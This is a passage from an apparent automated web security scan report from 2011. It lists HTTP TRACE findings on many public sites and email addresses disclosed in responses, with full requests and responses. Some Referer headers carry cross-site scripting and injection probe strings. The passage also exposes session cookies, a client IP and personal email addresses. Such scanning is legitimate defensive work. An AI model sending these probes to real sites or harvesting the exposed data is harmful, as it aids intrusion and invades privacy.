Set-Cookie: TSSESSID=ts-www0; path=/

TRACE / HTTP/1.0
Host: trueslant.com
Cookie: db3988582f75a100
X-Forwarded-For: 173.193.214.243

25.15. http://widgets.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 4dd16b8c78cf8eff

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:03 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 4dd16b8c78cf8eff
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.142.14
x-chpd-loop: 1
Via: 1.0 PXY003-DALL.COTENDO.NET (chpd/3
...[SNIP]...

25.16. http://www.aim.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aim.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 591c6ebd366fd02a

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aim.com
Cookie: 591c6ebd366fd02a
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243

25.17. http://www.batstrading.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.batstrading.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.batstrading.com
Cookie: 5735f040767e1e88

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 234
Date: Sun, 30 Jan 2011 01:52:13 GMT
Age: 0
Connection: close
X-BATS: 1112151759

TRACE / HTTP/1.0
Host: www.batstrading.com
Cookie: 5735f040767e1e88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
X-Varnish: 1112151759
X-Forwarded-For: 173.193.214.243

25.18. http://www.cannex.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cannex.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.cannex.com
Cookie: dadd1c08f1cd5690

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dadd1c08f1cd5690
Host: www.cannex.com

25.19. http://www.dooce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: 395680dce2efced4

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dooce.com
Cookie: 395680dce2efced4

25.20. http://www.interactivedata-rts.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivedata-rts.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.interactivedata-rts.com
Cookie: 2684a225c239a70c

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:39 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.interactivedata-rts.com
Cookie: 2684a225c239a70c

25.21. http://www.mozilla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mozilla.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.mozilla.org
Cookie: 50c3841031fed89c

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Sat, 29 Jan 2011 23:31:27 GMT
Connection: close
X-Cache-Info: not cacheable; request wasn't a GET or HEAD

TRACE / HTTP/1.0
Host: www.mozilla.org
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 50c3841031fed89c
Connection: Keep-Alive

25.22. http://www.popsci.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popsci.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.popsci.com
Cookie: b797bae89f5d6272

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popsci.com
Cookie: b797bae89f5d6272

25.23. http://www.scienceblogs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scienceblogs.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.scienceblogs.com
Cookie: 1f3b6f49471069bb

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:56 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.scienceblogs.com
Cookie: 1f3b6f49471069bb

25.24. http://www.sciencenews.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sciencenews.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sciencenews.org
Cookie: 4ccd232250f0ed44

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sciencenews.org
Cookie: 4ccd232250f0ed44

25.25. http://www.six-telekurs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.six-telekurs.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.six-telekurs.com
Cookie: 55056fa9b8236dc4

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.six-telekurs.com
Cookie: 55056fa9b8236dc4

25.26. http://www.spacedaily.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacedaily.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.spacedaily.com
Cookie: b5069e6f69e32e8f

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:41 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.spacedaily.com
Cookie: b5069e6f69e32e8f

25.27. http://www.stylemepretty.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.stylemepretty.com
Cookie: 58349650c2926a6b

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:25 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stylemepretty.com
Cookie: 58349650c2926a6b

25.28. http://www.terra.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.terra.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 88767bc2fa170a3e

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 88767bc2fa170a3e

25.29. http://www.thespacereview.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thespacereview.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.thespacereview.com
Cookie: 91f1185a8577c9f1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:35 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 91f1185a8577c9f1
Host: www.thespacereview.com

25.30. http://www.transterrestrial.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.transterrestrial.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.transterrestrial.com
Cookie: 9dad039183bb4329

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:47 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.transterrestrial.com
Cookie: 9dad039183bb4329

25.31. http://www.unmannedspaceflight.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unmannedspaceflight.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.unmannedspaceflight.com
Cookie: 6f2cbcc402bb28e8

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:43 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6f2cbcc402bb28e8
Host: www.unmannedspaceflight.com

25.32. http://www.zacks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.zacks.com
Cookie: ef998b28f897a6ed

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:18 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zacks.com
Cookie: ef998b28f897a6ed

26. Email addresses disclosed previous next
There are 158 instances of this issue:

http://ads.redacted/library/dap.js
http://ads1.redacted/library/dap.js
http://ads1.redacted/library/dapbeta.js
http://alex-johnson.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js
http://athima-chansanchai.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js
http://bassistance.de/jquery-plugins/jquery-plugin-validation/
http://blogs.discovermagazine.com/loom/
http://bodyodd.msnbc.redacted/
http://boyle.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js
http://cosmiclog.msnbc.redacted/
http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/
http://curmudgeons.blogspot.com/
http://docs.jquery.com/Plugins/Validation
http://editorial.autos.redacted/blogs/autosblog.aspx
http://fancybox.net/
http://forums.silverlight.net/forums/19.aspx
http://forums.silverlight.net/forums/65.aspx
http://helenaspopkin.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js
http://i1.codeplex.com/scripts/v17501/i1879048191/ScriptLoader.ashx
http://i2.silverlight.net/resources/script/omniture/s_code_dotnet.min.js
http://images.hoovers.com/dc/js/omniture/s_code.js
http://informationarbitrage.com/api/read/json
http://informationarbitrage.com/api/read/json
http://informationarbitrage.com/api/read/json
http://informationarbitrage.com/api/read/json
http://jqueryui.com/about
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://login.live.com/login.srf
https://login.live.com/login.srf
https://login.live.com/pp900/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js
http://mediacdn.disqus.com/1296297835/build/system/disqus.js
http://mediacdn.disqus.com/1296297835/js/dist/lib.js
http://money.redacted/common/welcome-to-the-new-msn-money.aspx
http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx
http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx
http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx
http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx
http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/
https://msnia.login.live.com/ppsecure/post.srf
http://news.sciencemag.org/scienceinsider/
http://openchannel.msnbc.redacted/
http://recruiting.scout.com/
http://redtape.msnbc.com/
http://rss.scout.com/rss.aspx
http://science.slashdot.org/
https://secure.shared.live.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://sstatic.net/Js/third-party/jquery.typewatch.js
http://sstatic.net/Js/third-party/openid-jquery.js
http://sstatic.net/Js/wmd.js
http://sstatic.net/js/master.min.js
http://sstatic.net/js/question.js
http://sstatic.net/openid.css
http://sstatic.net/stackoverflow/all.css
http://sstatic.net/stackoverflow/img/favicon.ico
http://stackoverflow.com/
http://stackoverflow.com/posts/4843433/ivc/3344
http://stackoverflow.com/questions
http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
http://stackoverflow.com/tags
http://stackoverflow.com/users
http://stackoverflow.com/users/login
http://stackoverflow.com/users/login/global/request
http://technolog.msnbc.redacted/security
http://technolog.msnbc.redacted/video
http://technolog.msnbc.redacted/viral
http://technolog.msnbc.redacted/youtube
http://thelastword.msnbc.redacted/
http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx
http://today.msnbc.redacted/id/37616868
http://today.msnbc.redacted/id/41319614/ns/today-entertainment/
http://wbenedetti.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js
http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html
http://www.bing.com/s/osd3.xml
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.bloglines.com/contact/
http://www.bloglines.com/js/r200702160/bl/home.js
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno
http://www.everyblock.com/
http://www.gnu.org/licenses/gpl.html
http://www.hobbyspace.com/
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/32359544/
http://www.msnbc.redacted/id/3303511/
http://www.msnbc.redacted/id/3303540/
http://www.msnbc.redacted/id/37643077
http://www.msnbc.redacted/id/41164445/ns/world_news-africa/
http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science
http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/
http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41317259/ns/politics
http://www.msnbc.redacted/id/41317259/ns/politics/
http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets
http://www.msnbc.redacted/id/41321565/ns/business/
http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa
http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41324031
http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia
http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/
http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news
http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/
http://www.msnbc.redacted/id/41324877/ns/world_news-europe
http://www.msnbc.redacted/id/41324877/ns/world_news-europe/
http://www.msnbc.redacted/id/41326456/ns/business-media_biz/
http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia
http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/
http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/
http://www.msnbc.redacted/id/41327694/ns/us_news/
http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41327924/ns/world_news-europe/
http://www.msnbc.redacted/id/41328059/ns/us_news/
http://www.msnbc.redacted/id/41328834/ns/world_news-europe/
http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/
http://www.msnbc.redacted/id/41330515/ns/us_news-life/
http://www.msnbc.redacted/id/41330876/ns/world_news-europe/
http://www.nasawatch.com/
http://www.newsvine.com/_vine/js/vs/master.xml
https://www.newsvine.com/_vine/js/msnbc/s_code.js
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js
http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js
http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js
http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js
http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js
http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js
http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js
http://www.polls.newsvine.com/_vine/js/m1/common.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js
http://www.polls.newsvine.com/education
http://www.polls.newsvine.com/world-news
http://www.popsci.com/
http://www.popsci.com/files/js/ee31ad0468d1381137041de39ea20f10.js
http://www.scientificamerican.com/blog/observations/
http://www.scientificamerican.com/errors/404.cfm
http://www.scout.com/3/privacy-policy.html
http://www.scout.com/3/terms-of-service.html
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.silverlight.net/
http://www.silverlight.net/community/
http://www.silverlight.net/privacy.aspx
http://www.silverlight.net/resources/script/omniture/s_code_dotnet.min.js
http://www.silverlight.net/termsofuse.aspx
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.tigerdirect.com/applications/SearchTools/item-details.asp
http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd
http://www.w3.org/TR/html4/strict.dtd

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

26.1. http://ads.redacted/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.redacted
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Host: ads.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Sun, 30 Jan 2011 01:19:40 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 17:58:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 13856

var _daprr=new Array('http://rad.redacted/ADSAdClient31.dll?GetSAd=','http://a.rad.redacted/ADSAdClient31.dll?GetSAd=', 'http://b.rad.redacted/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

26.2. http://ads1.redacted/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.redacted
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Host: ads1.redacted
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D
If-Modified-Since: Fri, 17 Sep 2010 17:58:18 GMT

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:24:32 GMT
Expires: Mon, 31 Jan 2011 19:33:24 GMT
Last-Modified: Fri, 17 Sep 2010 17:58:18 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13856

var _daprr=new Array('http://rad.redacted/ADSAdClient31.dll?GetSAd=','http://a.rad.redacted/ADSAdClient31.dll?GetSAd=', 'http://b.rad.redacted/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

26.3. http://ads1.redacted/library/dapbeta.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.redacted
Path:	/library/dapbeta.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dapbeta.js HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
If-Modified-Since: Tue, 19 Oct 2010 21:15:54 GMT
Host: ads1.redacted
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:45:16 GMT
Expires: Thu, 30 Dec 2010 10:04:37 GMT
Last-Modified: Tue, 19 Oct 2010 21:15:54 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 3737

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

26.4. http://alex-johnson.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

dstender@st-webdevelopment.de
wiley14@gmail.com

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: alex-johnson.newsvine.com
Proxy-Connection: keep-alive
Referer: http://alex-johnson.newsvine.com/?3e2c2%22-alert(1)-%224c5f2da1b50=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=325847da6769430ff5ec3a6f9466c9cb

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:10 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:52:10 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
* CPAINT - Cross-Platform Asynchronous INterface Toolkit
*
* http://cpaint.sourceforge.net
*
* released under the terms of the LGPL
* see http://www.fsf.org/licensing/licenses/lgpl.txt for
...[SNIP]...
<wiley14@gmail.com>
...[SNIP]...
<dstender@st-webdevelopment.de>
...[SNIP]...

26.5. http://athima-chansanchai.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

Issue detail

The following email addresses were disclosed in the response:

dstender@st-webdevelopment.de
wiley14@gmail.com

Request

GET /_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js HTTP/1.1
Host: athima-chansanchai.newsvine.com
Proxy-Connection: keep-alive
Referer: http://athima-chansanchai.newsvine.com/?a87ee%22-alert(1)-%222c5f9f4d1a4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=1d1d23b7294c7a0a950c54ae75d3a8dc

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:52:54 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 22 Jul 2008 22:32:25 GMT
ETag: "17c51e-2f1b-452a465ed3040"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 17:52:54 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Connection: Keep-Alive
Content-Length: 12059

/**
